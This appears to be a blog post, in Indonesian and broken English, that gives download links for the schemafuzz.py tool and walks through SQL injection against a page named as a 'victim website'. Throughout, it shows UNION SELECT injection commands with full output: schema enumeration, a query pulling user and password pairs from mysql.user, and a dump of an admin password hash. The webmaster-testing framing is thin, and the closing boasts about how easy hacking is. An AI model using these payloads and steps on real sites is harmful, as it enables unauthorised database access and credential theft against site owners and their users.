Scamfuzz

Bagi anda yang berprofesi sebagai webmaster, silahkan download file ini, untuk nguji apa ada kesalahan sql anda, setelah yakin tak ada kesalahan barulah di upload.

nah tool nya gak besar kok bisa di dapat di

http://rs344.rapidshare.com/files/171947021/schemafuzz.rar
http://www.darkc0de.com/tutorials/schemafuzz.rar
Semoga itu berguna... untuk menggunaknya bisa baca manual berikut ini.

schemafuzz.py-u "http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de, 2,3,4,5" - schema-D namadatabasenya

. / schemafuzz.py-u "http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de, 2,3,4,5" - schema-D webthings


[+] URL: http://127.0.0.1/ + AND +1 = 2 + UNION + SELECT +0, darkc0de ,2,3,4,5 --
[+] Evasion Used: "+" "-"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration ...

Database: webthings
User: @ localhost testing
Version: 5.0.51a

[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33

[Database]: webthings
[Table: Columns]
[0] wt_articles: cod, article_id, Subtitle, page, text, text_ori, htmlarticle, views
[1] wt_articles_title: article_id, category, title, active, date, userid, views
[2] wt_articlescat: cod, category
[3] wt_banners: cod, name, active, image, url_image, url, code, views, clicks, period, start_date, end_date
[4] wt_banners_log: banner, date, views, clicks, sessions
[5] wt_banners_rawlog: banner, type, date, session
[6] wt_centerboxes: cod, mail, active, oneverypage, menuoption, title, content, file, type, draw_box

[7] wt_comments: cod, type, link, date, userid, comment
[8] wt_config: id, config
[9] wt_downloads: id, category, name, active, url, date, size, count, rate_sum, rate_count, short_description, description, small_picture, big_picture, AUTHOR_NAME, author_email, comments, url_screenshot, license, license_text
[10] wt_downloadscat: cod, ref, name, descr
[11] wt_faq: cod, topic, uid, active, question_ori, question, answer_ori, answer
[12] wt_faq_topics: cod, name
[13] wt_forum_log_topics: uid, msgid, logtime, notifysent
[14] wt_forum_msgs: cod, forum, msg_ref, date, userid, title, text_ori, date_der, views, closed, sticky, modifiedtime, modifiedname, notifies
[15] wt_forums: cod, title, descr, locked, notifies, register
[16] wt_forums_mod: forum, userid, type
[17] wt_guestbook: id, datum, naam, email, homepage, plaats, tekst
[18] wt_links: id, category, active, name, url, count, descr, Obs
[19] wt_linkscat: cod, name, descr, parent_id
[20] wt_menu: id, mail, title, url, type, Newwindow, lang
[21] wt_news: cod, lang, category, catimgpos, date, title, userid, image, align, active, counter, text, text_ori, full_text, full_text_ori, Archived, sidebox, sideboxtitle, sideboxpos
[22] wt_newscat: cod, name, image
[23] wt_online: id, time, uid
[24] wt_picofday: id, category, userid, small_picture, big_picture, description, full_description, views, clicks
[25] wt_picofdaycat: id, name, description
[26] wt_picofdaysel: date, picture_id, views, clicks
[27] wt_polls: cod, dtstart, dtend, question, item01, item02, item03, item04, item05, item06, item07, item08, item09, item10, count01, count02, count03, count04, count05, count06, count07, count08, count09 , count10
[28] wt_sideboxes: cod, post, side, active, title, content, file, type, function, modules
[29] wt_user_access: userid, module
[30] wt_user_book: userid, cod_user
[31] wt_user_msgs: cod, userid, folder, date, user_from, title, msg_read, text, Notify
[32] wt_users: uid, name, password, class, realname, email,
newsposted, commentsposted, faqposted, topicsposted, dateregistered, dateactivated, lastvisit, logins, newemail, newemailsess, avatars, lang, theme, signature, banned, msn, showemail


[-] [01:43:48]
[-] Total URL Requests 270
[-] Done


to see if we can load_file in the site use this command

. / schemafuzz.py-u "http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de, 2,3,4,5" - info
it will appear like this

[+] URL: http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de ,2,3,4,5 --
[+] Evasion Used: "+" "-"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration ...
Database: webthings
User: @ localhost testing
Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <- w00t w00t
[!] Http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, concat (user, 0x3a, password), 2,3,4, 5 + FROM + mysql.user---
[+] Do we have to Load_File Access: No
[-] [01:46:51]
[-] Total URL Requests 3
[-] Done

that we can load_file but I can access the database to mysqlnya hehehe
to know that there are several databases on the site, we use a command like this


. / schemafuzz.py-u "http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de, 2,3,4,5" - DBS

will appear like this


[+] URL: http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de ,2,3,4,5 --
[+] Evasion Used: "+" "-"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration ...
Database: webthings
User: @ localhost testing
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0]? Webthings?
[-] [01:58:17]
[-] Total URL Requests 30
[-] Done

next steps

--------------------
. / schemafuzz.py-u "http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de, 2,3,4,5" - dump webthing-D-T-C wt_users name, password


[+] URL: http://127.0.0.1/websitekorbant?id=30 + AND +1 = 2 + UNION + SELECT +0, darkc0de ,2,3,4,5 --
[+] Evasion Used: "+" "-"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration ...
Database: webthings
User: @ localhost testing
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column (s) [ 'name', 'password']
[+] Number of Rows: 2

[0] admin: e00b29d5b34c3f78df09d45921c9ec47:

[-] [02:08:48]
[-] Total URL Requests 4
[-] Done

Begitulah, sungguh mudah menjadi hacker yax.. apa kah hacking itu semudah itu ? em.. tak taulah yang jelas gak ada yang sulit brother.. gak ada yang sulit kalo kalian mau.

Am not hacker but am will be a real hacker :)

0 komentar: